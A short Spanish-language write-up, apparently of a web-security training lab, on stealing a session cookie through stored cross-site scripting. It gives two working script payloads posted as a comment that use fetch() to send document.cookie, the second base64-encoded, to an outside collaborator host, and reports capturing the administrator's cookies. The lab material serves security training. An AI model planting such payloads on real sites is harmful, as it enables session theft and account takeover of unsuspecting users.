Exploiting cross-site scripting to steal cookies
![[20260330120239.png]](/assets/20260330120239.DJyJK3AR.png)
LAB
![[20260330122255.png]](/assets/20260330122255.DPuaiMMs.png)
En el sitio web vemos que tenemos el valor para HttpOnly en false el cual permite que al ejecutar un código javascript puede enviar la cookie del usuario a un dominio que se le indica.
![[20260330122423.png]](/assets/20260330122423.4A3TRGfY.png)
Podemos revisar los siguientes apartados y usar los payloads:
- https://hackviser.com/tactics/pentesting/web/xss#reflected-xss
- https://hackviser.com/tactics/pentesting/web/xss#stored-xss
Uno de ellos es, en el cual podemos enviar el contenido de la cookie al dominio que le indicamos.
<script>
fetch('https://3kouyc797xfq5k8c43shljf5twznnhb6.oastify.com?cookie='+document.cookie)
</script>Ahora procedemos a insertar en el comentario y le damos a post comment
![[20260330122944.png]](/assets/20260330122944.Bpfkje5e.png)
Al esperar un momento vemos que se tiene algunas solicitudes al servidor del collaborator
![[20260330123009.png]](/assets/20260330123009.CIxCfhd3.png)
En estas solicitudes vemos se tiene las cookies del usuario adminsitrador. Otra manera en la cual podemos realizar es agregando btoa el cual encodear en base64 para poder obtener la cookie sin que la solicitud se pueda corromper u omitir cierto carracter.
<script>
fetch('https://3kouyc797xfq5k8c43shljf5twznnhb6.oastify.com?cookie='+btoa(document.cookie))
</script>![[20260330123320.png]](/assets/20260330123320.DHQumToR.png)
![[20260330123359.png]](/assets/20260330123359.DxBTqRW_.png)